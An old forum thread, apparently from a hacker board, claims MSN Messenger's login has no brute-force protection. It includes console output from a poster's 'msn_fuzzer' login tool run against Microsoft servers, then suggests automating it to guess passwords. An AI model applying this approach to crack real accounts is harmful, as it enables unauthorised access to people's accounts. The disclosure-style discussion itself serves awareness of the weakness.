I personally recommand to use a really complex MSN password because the authentication system of the actual MSN P9 & 10 is public and the MS servers are running without password bruteforce protections.
I mean that anyone with a minimal skill can code a small program able to crack your MSN password , knowing of course your username, most likely an email.
I guess there is nothing publicly or privately coded yet doing this, else MS should update the protocol again, nor to build a ban protection..

I will post something as a white proof.

8)

C:\IIS\Projects\Exploits\MSN_fuzzer\Release>msn_fuzzer ace@addict3d.org w00t
[.] Resolving.....: messenger.hotmail.com
[.] Resolving.....: messenger.hotmail.com = 65.54.239.210
[.] Connecting....: 65.54.239.210:1863
[.] Connected.....: 65.54.239.210:1863
[.] Connected.....: logging (ace@addict3d.org)
[.] Connected.....: buffer #1
[.] Connected.....: buffer #2
[.] Connected.....: buffer #3
[.] Transferred...: 207.46.6.112:1863
[.] Connected.....: 207.46.6.112:1863
[.] Connected.....: logging (ace@addict3d.org)
[.] Connected.....: buffer #1
[.] Connected.....: buffer #2
[.] Connected.....: buffer #3
[.] Connected.....: challenge string OK
[.] HTTPS.........: subconnection #1 (nexus.passport.com)
[.] HTTPS.........: retrieving login server
[.] HTTPS.........: retrieving login server (success)
[.] HTTPS.........: subconnection #2 (loginnet.passport.com)
[.] HTTPS.........: retrieving hash ticket
[.] HTTPS.........: unauthorized (login/passwd)


This automated in a .bat nor the code updated to guess all passwords possibility can be dangerous for your passeport .net account.

MS is always insecure.

Thanks for info.

Im sure that this nasty POC will be used to exploit some holes in a near futur:


[.] Resolving.....: messenger.hotmail.com
[.] Resolving.....: messenger.hotmail.com = 65.54.239.80
[.] Connecting....: 65.54.239.80:1863
[.] Connected.....: 65.54.239.80:1863
[.] Connected.....: logging (***)
[.] Connected.....: buffer #1
[.] Connected.....: buffer #2
[.] Connected.....: buffer #3
[.] Transferred...: 207.46.2.91:1863
[.] Connected.....: 207.46.2.91:1863
[.] Connected.....: logging (***)
[.] Connected.....: buffer #1
[.] Connected.....: buffer #2
[.] Connected.....: buffer #3
[.] Connected.....: challenge string OK
[.] HTTPS.........: subconnection #1 (nexus.passport.com)
[.] HTTPS.........: retrieving login server
[.] HTTPS.........: retrieving login server (success)
[.] HTTPS.........: subconnection #2 (loginnet.passport.com)
[.] HTTPS.........: retrieving hash ticket
[.] HTTPS.........: retrieving hash ticket (success)
[.] Connected.....: buffer #4
[.] Connected.....: login OK
[.] Connected.....: XFR 10 SB 207.46.2.167:1863 CKI 17303832.1124873636.19638
[.] Transferred...: 207.46.2.167:1863 (key:17303832.1124873636.19638)
[.] Connected.....: 207.46.2.167:1863
[.] Connected.....: buffer #1:USR 11 OK *** ***
[.] Connected.....: buffer #2:CAL 12 RINGING 17303832
[.] Connected.....: allowed to MSG
[.] Connected.....: MSG sent, sleeping and closing...


=]

heh
you are thinking to code 0-hour thingz not 0-day , I bet , lol

nor maybe someone else with a fresh h0le requesting my help ;P